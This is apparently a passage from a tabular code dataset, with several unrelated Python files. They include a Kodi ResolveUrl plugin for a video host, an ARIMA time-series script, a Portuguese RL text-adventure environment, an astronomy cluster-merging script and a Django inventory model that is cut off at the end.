index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
9,500 | 8dfea24545ec4bb95b66d4b5ff3c4936990eb73a | """
Plugin for ResolveUrl
Copyright (C) 2022 shellc0de
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import re
import base64
from resolveurl import common
from resolveurl.plugins.lib import helpers, jsunhunt
from resolveurl.resolver import ResolveUrl, ResolverError
class TubeloadResolver(ResolveUrl):
    """ResolveUrl plugin that extracts the playable media URL from tubeload.co embed pages."""
    name = 'tubeload'
    domains = ['tubeload.co']
    # Matches /embed/<id>, /e/<id> or /f/<id> paths on tubeload.co.
    pattern = r'(?://|\.)(tubeload\.co)/(?:embed|e|f)/([0-9a-zA-Z]+)'

    def get_media_url(self, host, media_id):
        """Fetch the embed page and return the decoded stream URL with playback headers appended.

        Raises:
            ResolverError: if the file was removed or no source variable was found.
        """
        web_url = self.get_url(host, media_id)
        rurl = 'https://{}/'.format(host)
        headers = {
            'Referer': rurl,
            'User-Agent': common.FF_USER_AGENT
        }
        html = self.net.http_GET(web_url, headers=headers).content
        if 'NOT FOUND' in html or 'Sorry' in html:
            raise ResolverError('File Removed')
        if jsunhunt.detect(html):
            # Page scripts are obfuscated; unpack only the <head> section,
            # which holds the script defining the source variable below.
            html = re.findall('<head>(.*?)</head>', html, re.S)[0]
            html = jsunhunt.unhunt(html)
        source = re.search(r'var\s*adbbdddffbad\s*=\s*"([^"]+)', html)
        if source:
            # 'verifypeer' is an option consumed by resolveurl's HTTP layer,
            # not an actual HTTP header.
            headers.update({'Origin': rurl[:-1], 'verifypeer': 'false'})
            # The base64 payload is salted with two junk substrings; strip
            # them before decoding to recover the real URL.
            url = source.group(1).replace('MzY3Y2E4NTAzNmQ5NDkzN2FiNTQzZTBiNmI4YTIwYzg', '')
            url = url.replace('NjYxOWU2OTNmZWQ0M2I3ZTFhM2U4NTc4Y2NhZmY3NmM=', '')
            url = base64.b64decode(url).decode('utf-8')
            return url + helpers.append_headers(headers)
        raise ResolverError('File Not Found')

    def get_url(self, host, media_id):
        """Build the canonical embed URL for this host/media id."""
        return self._default_get_url(host, media_id, template='https://{host}/e/{media_id}')
|
9,501 | 8e28135da60f8e11459697c4ae9c63e60c437d7a | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri May 24 18:46:26 2019
@author: kiran
"""
import matplotlib.pylab as plt
import pandas as pd
import numpy as np
import statsmodels as sm
from statsmodels.graphics.tsaplots import plot_acf, plot_pacf
from statsmodels.tsa.stattools import acf, pacf
from statsmodels.tsa.arima_model import ARIMA
from matplotlib.pylab import rcParams
rcParams['figure.figsize'] = 15, 6
# Importing the dataset: annual Canadian lynx trappings, 114 yearly observations
# starting 1821 (indexed by year-end dates).
mylynx_df = pd.read_csv('LYNXdata.csv', header=0, names=['year', 'trappings'], index_col=0)
# BUG FIX: the original passed the bare expression 31/12/1821 — which Python
# evaluates as the float 31/12/1821 ≈ 0.0014 — as the date_range start.
# The start must be a date string so the yearly index begins at 1821-12-31.
mylynxts = pd.Series(mylynx_df['trappings'].values,
                     index=pd.DatetimeIndex(data=tuple(pd.date_range('31/12/1821', periods=114, freq='A-DEC')),
                                            freq='A-DEC'))
#Dickey-fuller test
def stationarity_test(mylynxts):
    """Run an augmented Dickey-Fuller unit-root test and print the summary.

    Args:
        mylynxts: pandas Series to test for stationarity.

    Returns:
        pandas Series holding the test statistic, p-value, lags used and
        number of observations. The original printed but returned None;
        returning the summary is backward-compatible and lets callers
        inspect the p-value programmatically.
    """
    from statsmodels.tsa.stattools import adfuller
    print('Results of Dickey-Fuller Test:')
    df_test = adfuller(mylynxts, autolag='AIC')
    df_output = pd.Series(df_test[0:4],
                          index=['Test Statistic', 'p-value', '#lags_used',
                                 'Number of Observation Used'])
    print(df_output)
    return df_output
stationarity_test(mylynxts)
# Arima Model: AR order 3, no differencing, no MA terms.
model = ARIMA(mylynxts, order=(3, 0, 0))
results_AR = model.fit()
# Overlay fitted values (red) on the observed series.
plt.plot(mylynxts)
plt.plot(results_AR.fittedvalues, color='red')
'''
information criteria and resdiuals need to be checked.
'''
# information summary (AIC/BIC, coefficient table)
results_AR.summary()
# residual plot: the residual ACF should show no significant lags if the fit is adequate
fig = plt.figure(figsize=(12, 8))
ax1 = fig.add_subplot(211)
fig = plot_acf(results_AR.resid, lags=20, ax=ax1)
# importing function for normal distribution
from scipy.stats import norm
plt.figure(figsize=(10, 6))
plt.hist(results_AR.resid, bins='auto', density=True, rwidth=0.85, label='residuals')  # density=True so the normal-pdf curve is comparable
# Fit a normal distribution to the residuals and draw its pdf over the histogram.
mu, std = norm.fit(results_AR.resid)
xmin, xmax = plt.xlim()
x = np.linspace(xmin, xmax, 100)
p = norm.pdf(x, mu, std)
plt.plot(x, p, 'm', linewidth=2)
plt.grid(axis='y', alpha=0.2)
plt.xlabel('Residuals')
plt.ylabel('Density')
# NOTE(review): title says "2,0,0" but the model fitted above is order (3,0,0) — confirm which is intended.
plt.title('Residuals 2,0,0 vs Normal Distribution - Mean ='+ str(round(mu,2))+', std ='+str(round(std,2)))
plt.show()
|
9,502 | 7cf6a4b8057280b38572dd92693013724751c47f | import numpy as np
import cv2
print("read imafe from file" )
img = cv2.imread("panda.jpg")
print("create a window holder for the image")
cv2.namedWindow("Image",cv2.WINDOW_NORMAL)
print ('display the image ')
cv2.imshow("Image",img)
print ('press a key inside the image to make a copy')
cv2.waitKey(0)
|
9,503 | 22f4ae755e7ea43604db39452ca80f44f540708a | import pandas as pd
dict_data = {'c0': [1, 2, 3], 'c1': [4, 5, 6], 'c2': [
7, 8, 9], 'c3': [10, 11, 12], 'c4': [13, 14, 15]}
df = pd.DataFrame(dict_data)
print(type(df))
print('\n')
print(df)
# <class 'pandas.core.frame.DataFrame'>
# c0 c1 c2 c3 c4
# 0 1 4 7 10 13
# 1 2 5 8 11 14
# 2 3 6 9 12 15
|
9,504 | 38ffbb6a66837e975a611a57579bb365ab69a32c | """
\tSeja bem-vindo ao Admirável Mundo Novo!
\tO objetivo do jogo é dar suporte ao desenvolvimento de Agentes Inteligentes que utilizam Deep Reinforcement Learning
\tpara tarefas de Processamento de Linguagem Natural em língua portuguesa.
\tAutor: Gabriel Pontes (@ograndoptimist)
"""
import random
from source.emulador.textos import ESTADOS
from source.emulador.textos import ACOES
from source.emulador.textos import REFORCOS
from source.emulador.textos import FINALIZADO
from source.emulador.textos import DIMENSOES
print(__doc__)
class AdmiravelMundoNovo(object):
    """Text-adventure environment for RL agents (Portuguese NLP tasks).

    The game has 14 numbered states plus a final state. Each `_estado_N`
    method loads that state's description text, action texts, action-space
    size and reward from the module-level tables (ESTADOS, ACOES, DIMENSOES,
    REFORCOS, FINALIZADO); `transicao_estado` mutates the environment in
    place while `emulador` returns the would-be next observation without
    mutating state.
    """

    def __init__(self):
        self.reforco = 0                 # accumulated reward over the episode
        self._checa_estado = False       # NOTE(review): set but never read in this file
        self._estado_texto = None        # current state's description text
        self._estado_acao = None         # current state's action texts
        self._finalizado = False         # True once the final state is reached
        self._espaco_acoes = None        # size of the current action space
        self._estados_texto = ESTADOS
        self._acao_textos = ACOES
        self._acao_dimensoes = DIMENSOES
        self._estados_reforcos = REFORCOS
        self._estados_finalizado = FINALIZADO
        self._valores_estados_iniciais = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]
        # NOTE(review): the concatenation below yields "ouro.." (doubled
        # period) — confirm whether that is intended.
        print("\tO objetivo do jogo é coletar a chave preciosa de ouro." +
              ".\n\tPara tal, você precisa vasculhar a Ilha da Fantasia.")
        print()
        self._escolha_estado_inicial()

    def _escolha_estado_inicial(self):
        """Start the episode in a uniformly random state from 1..13."""
        escolha = random.choice(self._valores_estados_iniciais)
        if escolha == 1:
            self._estado_1()
        elif escolha == 2:
            self._estado_2()
        elif escolha == 3:
            self._estado_3()
        elif escolha == 4:
            self._estado_4()
        elif escolha == 5:
            self._estado_5()
        elif escolha == 6:
            self._estado_6()
        elif escolha == 7:
            self._estado_7()
        elif escolha == 8:
            self._estado_8()
        elif escolha == 9:
            self._estado_9()
        elif escolha == 10:
            self._estado_10()
        elif escolha == 11:
            self._estado_11()
        elif escolha == 12:
            self._estado_12()
        elif escolha == 13:
            self._estado_13()
        elif escolha == 14:
            # NOTE(review): unreachable — 14 is not in
            # _valores_estados_iniciais above.
            self._estado_14()

    def transicao_estado(self, acao):
        """Apply `acao` in the current state, mutating the environment.

        Branch order matters: earlier clauses shadow later ones for the
        same (state, action) pair.
        """
        if self._valor_estado == 2 and acao == 0:
            self._estado_6()
        elif self._valor_estado == 2 and acao == 1:
            # NOTE(review): `emulador` maps (state 2, action 1) to estado_9,
            # but this method goes to estado_3 — confirm which is correct.
            self._estado_3()
        elif self._valor_estado in [1, 3, 4] and acao == 0:
            self._estado_2()
        elif self._valor_estado == 3 and acao == 1:
            self._estado_5()
        elif self._valor_estado == 2 and acao == 2:
            self._estado_4()
        elif self._valor_estado == 5 and acao == 1:
            self._estado_3()
        elif self._valor_estado == 6 and acao == 1:
            self._estado_7()
        elif self._valor_estado in [7, 8] and acao == 0:
            self._estado_6()
        elif self._valor_estado == 6 and acao == 2:
            self._estado_8()
        elif self._valor_estado in [6, 10, 11] and acao == 0:
            self._estado_9()
        elif self._valor_estado == 9 and acao == 1:
            self._estado_10()
        elif self._valor_estado == 9 and acao == 2:
            self._estado_11()
        elif self._valor_estado in [5, 9, 13] and acao == 0:
            # NOTE(review): (5, 0) and (9, 0) can never reach here — they are
            # captured by earlier clauses above.
            self._estado_12()
        elif self._valor_estado == 12 and acao == 0:
            self._estado_13()
        elif self._valor_estado == 12 and acao == 1:
            self._estado_final()
        elif self._valor_estado == 9 and acao == 3:
            self._estado_6()
        elif self._valor_estado == 6 and acao == 3:
            self._estado_2()

    # Each _estado_N below loads state N's data and accumulates its reward.
    # NOTE(review): every state except 14/final reads
    # _estados_finalizado['estado_1'] — this looks like copy-paste; confirm
    # whether per-state keys were intended.
    def _estado_1(self):
        self._reforco_imediato = self._estados_reforcos['estado_1']
        self.reforco += self._reforco_imediato
        self._valor_estado = 1
        self._finalizado = self._estados_finalizado['estado_1']
        self._estado_texto = self._estados_texto['estado_1']
        self._estado_acao = self._acao_textos['estado_1']
        self._espaco_acoes = self._acao_dimensoes['estado_1']

    def _estado_2(self):
        self._reforco_imediato = self._estados_reforcos['estado_2']
        self.reforco += self._reforco_imediato
        self._valor_estado = 2
        self._finalizado = self._estados_finalizado['estado_1']
        self._estado_texto = self._estados_texto['estado_2']
        self._estado_acao = self._acao_textos['estado_2']
        self._espaco_acoes = self._acao_dimensoes['estado_2']

    def _estado_3(self):
        self._reforco_imediato = self._estados_reforcos['estado_3']
        self.reforco += self._reforco_imediato
        self._valor_estado = 3
        self._finalizado = self._estados_finalizado['estado_1']
        self._estado_texto = self._estados_texto['estado_3']
        self._estado_acao = self._acao_textos['estado_3']
        self._espaco_acoes = self._acao_dimensoes['estado_3']

    def _estado_4(self):
        self._reforco_imediato = self._estados_reforcos['estado_4']
        self.reforco += self._reforco_imediato
        self._valor_estado = 4
        self._finalizado = self._estados_finalizado['estado_1']
        self._estado_texto = self._estados_texto['estado_4']
        self._estado_acao = self._acao_textos['estado_4']
        self._espaco_acoes = self._acao_dimensoes['estado_4']

    def _estado_5(self):
        self._reforco_imediato = self._estados_reforcos['estado_5']
        self.reforco += self._reforco_imediato
        self._valor_estado = 5
        self._finalizado = self._estados_finalizado['estado_1']
        self._estado_texto = self._estados_texto['estado_5']
        self._estado_acao = self._acao_textos['estado_5']
        self._espaco_acoes = self._acao_dimensoes['estado_5']

    def _estado_6(self):
        self._reforco_imediato = self._estados_reforcos['estado_6']
        self.reforco += self._reforco_imediato
        self._valor_estado = 6
        self._finalizado = self._estados_finalizado['estado_1']
        self._estado_texto = self._estados_texto['estado_6']
        self._estado_acao = self._acao_textos['estado_6']
        self._espaco_acoes = self._acao_dimensoes['estado_6']

    def _estado_7(self):
        self._reforco_imediato = self._estados_reforcos['estado_7']
        self.reforco += self._reforco_imediato
        self._valor_estado = 7
        self._finalizado = self._estados_finalizado['estado_1']
        self._estado_texto = self._estados_texto['estado_7']
        self._estado_acao = self._acao_textos['estado_7']
        self._espaco_acoes = self._acao_dimensoes['estado_7']

    def _estado_8(self):
        # State 8 shares state 7's reward, action texts and dimensions
        # (only its description text is its own).
        self._reforco_imediato = self._estados_reforcos['estado_7']
        self.reforco += self._reforco_imediato
        self._valor_estado = 8
        self._finalizado = self._estados_finalizado['estado_1']
        self._estado_texto = self._estados_texto['estado_8']
        self._estado_acao = self._acao_textos['estado_7']
        self._espaco_acoes = self._acao_dimensoes['estado_7']

    def _estado_9(self):
        self._reforco_imediato = self._estados_reforcos['estado_9']
        self.reforco += self._reforco_imediato
        self._valor_estado = 9
        self._finalizado = self._estados_finalizado['estado_1']
        self._estado_texto = self._estados_texto['estado_9']
        self._estado_acao = self._acao_textos['estado_9']
        self._espaco_acoes = self._acao_dimensoes['estado_9']

    def _estado_10(self):
        self._reforco_imediato = self._estados_reforcos['estado_10']
        self.reforco += self._reforco_imediato
        self._valor_estado = 10
        self._finalizado = self._estados_finalizado['estado_1']
        self._estado_texto = self._estados_texto['estado_10']
        self._estado_acao = self._acao_textos['estado_10']
        self._espaco_acoes = self._acao_dimensoes['estado_10']

    def _estado_11(self):
        # State 11 shares state 10's reward, action texts and dimensions.
        self._reforco_imediato = self._estados_reforcos['estado_10']
        self.reforco += self._reforco_imediato
        self._valor_estado = 11
        self._finalizado = self._estados_finalizado['estado_1']
        self._estado_texto = self._estados_texto['estado_11']
        self._estado_acao = self._acao_textos['estado_10']
        self._espaco_acoes = self._acao_dimensoes['estado_10']

    def _estado_12(self):
        self._reforco_imediato = self._estados_reforcos['estado_12']
        self.reforco += self._reforco_imediato
        self._valor_estado = 12
        self._finalizado = self._estados_finalizado['estado_1']
        self._estado_texto = self._estados_texto['estado_12']
        self._estado_acao = self._acao_textos['estado_12']
        self._espaco_acoes = self._acao_dimensoes['estado_12']

    def _estado_13(self):
        # Penalty state: the reward is SUBTRACTED from the running total.
        self._reforco_imediato = self._estados_reforcos['estado_13']
        self.reforco -= self._reforco_imediato
        self._valor_estado = 13
        self._finalizado = self._estados_finalizado['estado_1']
        self._estado_texto = self._estados_texto['estado_13']
        self._estado_acao = self._acao_textos['estado_13']
        self._espaco_acoes = self._acao_dimensoes['estado_13']

    def _estado_14(self):
        # Penalty state; also the only numbered state reading its own
        # 'estado_14' finalizado flag.
        self._reforco_imediato = self._estados_reforcos['estado_14']
        self.reforco -= self._reforco_imediato
        self._valor_estado = 14
        self._finalizado = self._estados_finalizado['estado_14']
        self._estado_texto = self._estados_texto['estado_14']
        self._estado_acao = self._acao_textos['estado_14']
        self._espaco_acoes = self._acao_dimensoes['estado_14']

    def _estado_final(self):
        """Terminal state: add the final reward and report the total."""
        self._reforco_imediato = self._estados_reforcos['estado_final']
        self.reforco += self._reforco_imediato
        self._finalizado = self._estados_finalizado['estado_final']
        self._estado_texto = self._estados_texto['estado_final']
        print("\tReforço acumulado de {0}".format(self.reforco))
        self._estado_acao = ""

    def _pacote_acoes(self):
        """Return the list of action ids valid in the current state."""
        if self._valor_estado in [1, 4, 7, 8, 10, 11, 13]:
            return [0]
        elif self._valor_estado in [2]:
            return [0, 1, 2]
        elif self._valor_estado in [3, 5, 12]:
            return [0, 1]
        elif self._valor_estado in [9, 6]:
            return [0, 1, 2, 3]

    def checa_acao(self, acao):
        """Return True iff `acao` is valid in the current state."""
        if acao in self._pacote_acoes():
            return True
        else:
            return False

    def read_1(self):
        """Full observation: text, actions, action-space size, last reward, done flag."""
        return self._estado_texto, self._estado_acao, self._espaco_acoes, self._reforco_imediato, self._finalizado

    def read(self):
        """Reduced observation: text, actions and action-space size only."""
        return self._estado_texto, self._estado_acao, self._espaco_acoes

    def imprime_acao(self, acoes):
        """Print each action prefixed with its numeric id."""
        for cont, acao in enumerate(acoes):
            print("\t[{0}] {1}".format(cont, acao))

    def emulador(self, acao):
        """Return the observation tuple that `acao` WOULD produce, without
        mutating the environment (compare `transicao_estado`)."""
        if self._valor_estado == 2 and acao == 0:  # ok
            return self._estados_texto['estado_6'], self._acao_textos['estado_6'], self._acao_dimensoes['estado_6'], \
                self._estados_reforcos['estado_6'], self._estados_finalizado['estado_1']
        elif self._valor_estado == 2 and acao == 1:  # ok
            # NOTE(review): transicao_estado maps this pair to estado_3.
            return self._estados_texto['estado_9'], self._acao_textos['estado_9'], self._acao_dimensoes['estado_9'], \
                self._estados_reforcos['estado_9'], self._estados_finalizado['estado_1']
        elif self._valor_estado in [1, 3, 4] and acao == 0:
            return self._estados_texto['estado_2'], self._acao_textos['estado_2'], self._acao_dimensoes['estado_2'], \
                self._estados_reforcos['estado_2'], self._estados_finalizado['estado_1']
        elif self._valor_estado == 3 and acao == 1:
            return self._estados_texto['estado_5'], self._acao_textos['estado_5'], self._acao_dimensoes['estado_5'], \
                self._estados_reforcos['estado_5'], self._estados_finalizado['estado_1']
        elif self._valor_estado == 2 and acao == 2:  # ok
            return self._estados_texto['estado_4'], self._acao_textos['estado_4'], self._acao_dimensoes['estado_4'], \
                self._estados_reforcos['estado_4'], self._estados_finalizado['estado_1']
        elif self._valor_estado == 5 and acao == 1:
            return self._estados_texto['estado_9'], self._acao_textos['estado_9'], self._acao_dimensoes['estado_9'], \
                self._estados_reforcos['estado_9'], self._estados_finalizado['estado_1']
        elif self._valor_estado == 6 and acao == 1:
            return self._estados_texto['estado_7'], self._acao_textos['estado_7'], self._acao_dimensoes['estado_7'], \
                self._estados_reforcos['estado_7'], self._estados_finalizado['estado_1']
        elif self._valor_estado in [7, 8] and acao == 0:
            return self._estados_texto['estado_6'], self._acao_textos['estado_6'], self._acao_dimensoes['estado_6'], \
                self._estados_reforcos['estado_6'], self._estados_finalizado['estado_1']
        elif self._valor_estado == 6 and acao == 2:
            return self._estados_texto['estado_8'], self._acao_textos['estado_7'], self._acao_dimensoes['estado_7'], \
                self._estados_reforcos['estado_7'], self._estados_finalizado['estado_1']
        elif self._valor_estado == 9 and acao == 1:
            return self._estados_texto['estado_10'], self._acao_textos['estado_10'], self._acao_dimensoes['estado_10'], \
                self._estados_reforcos['estado_10'], self._estados_finalizado['estado_1']
        elif self._valor_estado in [6, 10, 11] and acao == 0:
            return self._estados_texto['estado_9'], self._acao_textos['estado_9'], self._acao_dimensoes['estado_9'], \
                self._estados_reforcos['estado_9'], self._estados_finalizado['estado_1']
        elif self._valor_estado == 9 and acao == 2:
            return self._estados_texto['estado_11'], self._acao_textos['estado_10'], self._acao_dimensoes['estado_10'], \
                self._estados_reforcos['estado_10'], self._estados_finalizado['estado_1']
        elif self._valor_estado in [5, 9, 13] and acao == 0:
            return self._estados_texto['estado_12'], self._acao_textos['estado_12'], self._acao_dimensoes['estado_12'], \
                self._estados_reforcos['estado_12'], self._estados_finalizado['estado_1']
        elif self._valor_estado == 12 and acao == 0:
            return self._estados_texto['estado_13'], self._acao_textos['estado_13'], self._acao_dimensoes['estado_13'], \
                self._estados_reforcos['estado_13'], self._estados_finalizado['estado_1']
        elif self._valor_estado == 12 and acao == 1:
            return self._estados_texto['estado_final'], self._acao_textos['estado_final'], self._acao_dimensoes[
                'estado_final'], self._estados_reforcos['estado_final'], self._estados_finalizado['estado_final']
        elif self._valor_estado == 9 and acao == 3:
            return self._estados_texto['estado_6'], self._acao_textos['estado_6'], self._acao_dimensoes['estado_6'], \
                self._estados_reforcos['estado_6'], self._estados_finalizado['estado_1']
        elif self._valor_estado == 6 and acao == 3:
            return self._estados_texto['estado_2'], self._acao_textos['estado_2'], self._acao_dimensoes['estado_2'], \
                self._estados_reforcos['estado_2'], self._estados_finalizado['estado_1']
|
9,505 | 6e845f2543b548fb936cc3719eb150e530281945 | stevila = [5, 2, 8, 3]
#Izpis vseh števil
print(stevila)
#Izpis števila na mestu 1
print(stevila[1]) |
9,506 | e81294c984497dbba9fa345b61abb8d781f136bf | #######################
# PYMERGE V.1.1 #
#######################
# Samuel Farrens 2014 #
#######################
"""@file pycatcut.v.1.1
@brief Code that merges cluster catalogues into a single catalogue.
@author Samuel Farrens
"""
import math, optparse, numpy as np
import errors
from classes.cluster import Cluster
from functions import merge, options
# Functions:
def read_file(file):
    """
    Function that reads a "galaxies" file and extracts the relevant fields.

    Uses the module-level `opts` (parsed command-line options) to decide
    between FITS and ASCII input. Returns (c_id, g_num, g_id, g_ra, g_dec,
    g_z): cluster ids, running galaxy index, galaxy ids, coordinates and
    redshifts as parallel arrays.
    """
    # NOTE(review): `fileio` does not appear in this script's imports —
    # presumably provided by one of the imported packages; verify before running.
    if opts.input_type == 'fits':
        data = fileio.read_fits(file)
    else:
        data = fileio.read_ascii(file)
    # Column layout: row 0 = cluster id, 3 = galaxy id, 4/5 = RA/Dec, 6 = z.
    c_id = data[0,:]
    g_num = np.array(range(len(c_id)), dtype = 'int')
    g_id = data[3,:]
    g_ra = np.array(data[4,:], dtype = 'float')
    g_dec = np.array(data[5,:], dtype = 'float')
    g_z = np.array(data[6,:], dtype = 'float')
    return c_id, g_num, g_id, g_ra, g_dec, g_z
def gal_count(clusters):
    """
    Return the total number of galaxies summed over all clusters.

    Each element of `clusters` must expose an `ngal` attribute. The
    original accumulated into a local variable named `sum`, shadowing the
    built-in; a generator expression is clearer and avoids the shadow.
    """
    return sum(cluster.ngal for cluster in clusters)
# Read Arguments (NOTE: this is Python 2 code — print statements and
# `print >>file` redirection are used throughout):
parser = optparse.OptionParser()
options.multiple_input(parser)
options.single_output(parser)
options.merge(parser)
(opts, args) = parser.parse_args()
# All three of these options are mandatory.
if not opts.input_files and not opts.input_file_list:
    parser.error('Input filename(s) not provided.')
if not opts.output_file:
    parser.error('Output filename not provided.')
if not opts.bg_expect:
    parser.error('Expected background density not provided.')
# Read List of Files: either a file listing catalogue paths, or paths
# given directly on the command line.
if opts.input_file_list:
    errors.file_name_error(opts.input_file_list)
    file_list = np.genfromtxt(opts.input_file_list, dtype="S", unpack = True)
elif opts.input_files:
    file_list = opts.input_files
# Read Files and Store Elements in Clusters: group galaxies by cluster id
# and build one Cluster object per id per file.
clusters = []
cluster_count = 0
for file in file_list:
    errors.file_name_error(file)
    print 'Reading: ', file
    c_id, g_num, g_id, g_ra, g_dec, g_z = read_file(file)
    cluster_list = np.unique(c_id)
    for clt in cluster_list:
        index = (c_id == clt)
        clusters.append(Cluster(cluster_count))
        clusters[cluster_count].extend(g_num[index], g_id[index], g_ra[index], g_dec[index], g_z[index])
        clusters[cluster_count].props(opts.bg_expect)
        cluster_count += 1
# Find matches and merge clusters (merge_clusters modifies `clusters` in place):
print 'Original number of clusters:', len(clusters)
print 'Original number of cluster members:', gal_count(clusters)
print 'Finding cluster matches and merging:'
merge.merge_clusters(clusters, opts.progress, opts.bg_expect, 0.5, 0.2)
print 'Final number of merged clusters:', len(clusters)
print 'Final number of merged cluster members:', gal_count(clusters)
# Output merged clusters, sorted by member count (descending):
ngals = []
for i in range(len(clusters)):
    ngals.append(clusters[i].ngal)
ngals = np.array(ngals)
index = ngals.argsort()[::-1]
if opts.output_type == 'ascii':
    # ASCII output: one clusters file and one galaxies file; the trailing
    # commas on print continue each record on the same line.
    clt_file = opts.output_file + '_clusters.dat'
    gal_file = opts.output_file + '_galaxies.dat'
    clt_out = open(clt_file,'w')
    gal_out = open(gal_file,'w')
    print>> clt_out, '#C_ID C_RA C_DEC C_Z C_NGAL C_SN C_AREA C_SIZE'
    print>> gal_out, '#C_ID C_NGAL G_ID G_RA G_DEC G_Z'
    for i in index:
        print>> clt_out, '%012d' % clusters[i].id,'%07.3f' % clusters[i].ra,
        print>> clt_out, '%+07.3f' % clusters[i].dec, '%05.3f' % clusters[i].z,
        print>> clt_out, '%06d' % clusters[i].ngal, '%06.3f' % clusters[i].sn,
        print>> clt_out, '%06.3f' % clusters[i].area, '%06.3f' % clusters[i].size
        for j in range(clusters[i].ngal):
            print>> gal_out, '%012d' % clusters[i].id,'%06d' % clusters[i].ngal,
            print>> gal_out, '%12s' % clusters[i].g_id[j],'%07.3f' % clusters[i].g_ra[j],
            print>> gal_out, '%+07.3f' % clusters[i].g_dec[j], '%05.3f' % clusters[i].g_z[j]
else:
    # FITS output: flatten the cluster/galaxy attributes into parallel
    # lists, then write two binary tables.
    clt_file = opts.output_file + '_clusters.fits'
    gal_file = opts.output_file + '_galaxies.fits'
    c_id = []
    c_ra = []
    c_dec = []
    c_z = []
    c_ngal = []
    c_sn = []
    c_area = []
    c_size = []
    c_id2 = []
    c_ngal2 = []
    g_id = []
    g_ra = []
    g_dec = []
    g_z = []
    for i in index:
        c_id.append(clusters[i].id)
        c_ra.append(clusters[i].ra)
        c_dec.append(clusters[i].dec)
        c_z.append(clusters[i].z)
        c_ngal.append(clusters[i].ngal)
        c_sn.append(clusters[i].sn)
        c_area.append(clusters[i].area)
        c_size.append(clusters[i].size)
        for j in range(clusters[i].ngal):
            c_id2.append(clusters[i].id)
            c_ngal2.append(clusters[i].ngal)
            g_id.append(clusters[i].g_id[j])
            g_ra.append(clusters[i].g_ra[j])
            g_dec.append(clusters[i].g_dec[j])
            g_z.append(clusters[i].g_z[j])
    c_id = np.array(c_id)
    c_ra = np.array(c_ra, dtype = 'float')
    c_dec = np.array(c_dec, dtype = 'float')
    c_z = np.array(c_z, dtype = 'float')
    c_ngal = np.array(c_ngal, dtype = 'float')
    c_sn = np.array(c_sn, dtype = 'float')
    c_area = np.array(c_area, dtype = 'float')
    c_size =np.array(c_size, dtype = 'float')
    c_id2 = np.array(c_id2)
    c_ngal2 = np.array(c_ngal2, dtype = 'float')
    g_id = np.array(g_id)
    g_ra = np.array(g_ra, dtype = 'float')
    g_dec = np.array(g_dec, dtype = 'float')
    g_z = np.array(g_z, dtype = 'float')
    from astropy.io import fits
    # NOTE(review): fits.new_table was removed in modern astropy — newer
    # versions use fits.BinTableHDU.from_columns; confirm the pinned version.
    tbhdu1 = fits.new_table(fits.ColDefs([fits.Column(name='c_id', format='8A', array = c_id),
                                          fits.Column(name='c_ra', format='D', array = c_ra),
                                          fits.Column(name='c_dec', format='D', array = c_dec),
                                          fits.Column(name='c_z', format='D', array = c_z),
                                          fits.Column(name='c_ngal', format='D', array = c_ngal),
                                          fits.Column(name='c_sn', format='D', array = c_sn),
                                          fits.Column(name='c_area', format='D', array = c_area),
                                          fits.Column(name='c_size', format='D', array = c_size)]))
    tbhdu2 = fits.new_table(fits.ColDefs([fits.Column(name='c_id', format='8A', array = c_id2),
                                          fits.Column(name='c_ngal', format='D', array = c_ngal2),
                                          fits.Column(name='g_id', format='8A', array = g_id),
                                          fits.Column(name='g_ra', format='D', array = g_ra),
                                          fits.Column(name='g_dec', format='D', array = g_dec),
                                          fits.Column(name='g_z', format='D', array = g_z)]))
    n = np.arange(100.0)
    hdu = fits.PrimaryHDU(n)
    thdulist1 = fits.HDUList([hdu, tbhdu1])
    thdulist2 = fits.HDUList([hdu, tbhdu2])
    thdulist1.writeto(clt_file)
    thdulist2.writeto(gal_file)
|
9,507 | 00fd5efa4c66b7bd4617f4c886eddcdf38b951b7 | print ("Hello, Django girls!")
volume = 57
if volume < 20:
print("It's kinda quiet.")
elif 20 <= volume < 40:
print("It's nice for background music")
elif 40 <= volume < 60:
print("Perfect, I can hear all the details")
elif 60 <= volume < 80:
print("Nice for parties")
elif 80 <= volume < 100:
print("A bit loud!")
else:
print("My ears are hurting! :(")
def hi():
    """Print a two-line friendly greeting."""
    for line in ('Hi there!', 'How are you?'):
        print(line)


hi()
9,508 | 8cb7290792f9390dd350e0c79711e0dd72d6063b | a=range(1,11) #1~10숫자를 에이에 저장
b=1
for i in a: #a에있는 원소를 b에 곱하고 비에 저장
b*=i
print(b)
|
9,509 | c2490c3aacfa3ce22c3f47a69dbc44b695c2a2e5 | # -*- coding:utf-8 -*-
from __future__ import unicode_literals
from django.db import models
# Django `choices` must be an ordered sequence of (value, label) pairs.
# BUG FIX: the originals were set literals, whose iteration order is
# arbitrary, so the rendered dropdown order (and generated migrations)
# could change between runs; lists keep the intended order stable.
SERVICE_RANGE_CHOISE = [(1, '1年'), (2, '2年'), (3, '3年'), (4, '4年'), (5, '5年'), (6, '6年'), (7, '7年'), (8, '8年'), (0, '长期')]
USER_STATUS_CHOISE = [(1, '停用'), (2, '正常'), (3, '锁定')]
DBSERVER_POS_CHOISE = [(1, '8层机房'), (2, '11层机房')]
FIRM_CHOISE = [(1, 'DELL'), (2, 'IBM'), (3, 'EMC')]
class Odbserver(models.Model):
    """Inventory record for a physical database server."""
    name = models.CharField(max_length=30, verbose_name='名称')
    ip = models.GenericIPAddressField(verbose_name='IP')
    pos = models.IntegerField(default=1, choices=DBSERVER_POS_CHOISE, verbose_name='位置')
    sn = models.CharField(null=True, blank=True, max_length=50, verbose_name='序列号')
    sid = models.CharField(null=True, blank=True, max_length=50, verbose_name='快速服务代码')
    firm = models.IntegerField(default=1, choices=FIRM_CHOISE, verbose_name='厂商')
    model = models.CharField(null=True, blank=True, max_length=30, verbose_name='型号')
    feature = models.TextField(null=True, blank=True, verbose_name='配置')
    buy_time = models.DateField(null=True, blank=True, verbose_name='购买时间')
    service_range = models.IntegerField(default=1, choices=SERVICE_RANGE_CHOISE, verbose_name='服务年限')
    comment = models.TextField(null=True, blank=True, verbose_name='备注')

    class Meta:
